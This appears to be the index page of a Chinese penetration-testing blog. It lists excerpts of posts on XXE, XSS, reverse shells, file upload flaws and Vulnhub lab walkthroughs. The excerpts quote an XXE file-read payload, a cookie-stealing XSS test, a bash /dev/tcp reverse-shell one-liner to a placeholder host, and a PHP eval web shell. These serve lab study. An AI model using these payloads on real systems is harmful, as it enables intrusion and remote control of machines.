Kyon-H Blog

「离开世界之前 一切都是过程」

XXE

XXE

1. XXE 介绍 【知识科普】今天聊聊XML这种文件格式_xml文件-CSDN博客 2. XXE payload 2.1. 有回显—读取文件 1 2 3 4 5 6 <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE ANY [ <!ENTITY content SYSTEM "file:///e...

Posted by Kyon-H on August 6, 2023

XSS跨站脚本攻击

Cross Site Scripting

1. XSS(Reflected) 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 <!--直接填--> <script>alert(document.cookie)</script> <script>confirm(...

Posted by Kyon-H on August 5, 2023

反弹WebShell

反弹WebShell

bash 1 2 3 4 # 攻击机 nc -lvvp port # 目标机 bash -i >& /dev/tcp/x.x.x.x/port 0>&1 1 2 3 4 5 6 7 8 9 # 方法2 exec 0&0 2>&0 0<&196;exec 196<>/dev/tcp/x.x.x.x/4444; ...

Posted by Kyon-H on August 2, 2023

文件上传漏洞

File Upload

dvwa、pikachu 靶场之文件上传漏洞 LOW the.php 1 <?php eval($_GET['bckdor'])?> 构造url: http://192.168.30.131/dvwa/hackable/uploads/the.php?bckdor= 1 2 phpinfo(); system('ls'); 中国菜刀 1 <?php...

Posted by Kyon-H on August 1, 2023

Momentum 2

Momentum 2

1. 信息收集 扫描 IP 发现 192.168.163.131 扫描端口,开发 80、22 端口 扫描目录 查看站点,/manual发现文件上传 相关 js 代码,向ajax.php发送数据,返回 1 代表成功 目录扫描发现 ajax.php.bak文件 根据代码,需要添加 cookie,且最后一位追加大写字母,设置参数 secure值为 val1d,...

Posted by Kyon-H on July 19, 2023

grotesque 3

grotesque 3

1. 信息搜集 IP 扫描,发现主机 192.168.163.142 端口扫描,发现 80、22 端口 1 nmap -A -p- 192.168.163.142 目录扫描,但未扫到任何东西 1 2 3 dirsearch -u http://192.168.163.142 -e* -i 200 nikto -h 192.168.163.142 dirb http://1...

Posted by Kyon-H on July 18, 2023

grotesque 2

grotesque 2

1. 环境搭建 Vuluhub 靶场 IP 问题 - Kyon-H Blog 2. 信息搜集 扫描 IP 发现主机 192.168.163.141 扫描端口 1 2 3 nmap -T4 -A -p- 192.168.163.141 # 无反应 # 简单扫描 nmap 192.168.163.141 发现有多个端口开放,其中有 80 22 端口 访问 80 只有一张图...

Posted by Kyon-H on July 18, 2023

DC-9

DC-9

1. 信息搜集 扫描 IP 发现主机 192.168.163.135 扫描端口,发现 80 端口开放,22 端口 filtered 说明可能存在 ssh 服务,但被拒绝访问 1 nmap -T4 -A -p- 192.168.163.135 扫描目录 1 dirsearch -u http://192.168.163.135/ -e* -i 200 /search...

Posted by Kyon-H on July 17, 2023

DC-8

DC-8

1. 信息搜集 扫描 IP,发现主机 192.168.163.131 扫描端口发现 80 和 22 端口 1 nmap -T4 -A -p- 192.168.163.131 目录扫描发现登录地址 /user/login/ 1 dirsearch -u http://192.168.163.131 -e* -i 200 指纹识别,发现站点为 Drupal 7 1 ...

Posted by Kyon-H on July 17, 2023

grotesque 1

grotesque 1

1. 环境搭建 Vuluhub 靶场 IP 问题 - Kyon-H Blog 2. 信息搜集 搜索 IP,发现主机 192.168.163.134 扫描端口发现 66 和 80 两个 http 端口 1 namp -T4 -A -p- 192.168.163.134 扫描目录,发现 80 端口无内容,扫描 66 端口 1 dirsearch -u http://192...

Posted by Kyon-H on July 16, 2023

FEATURED TAGS
DVWA 靶场实战 Vulnhub DC系列 服务器 CTFHub Ubuntu 内网防护 渗透测试
ABOUT ME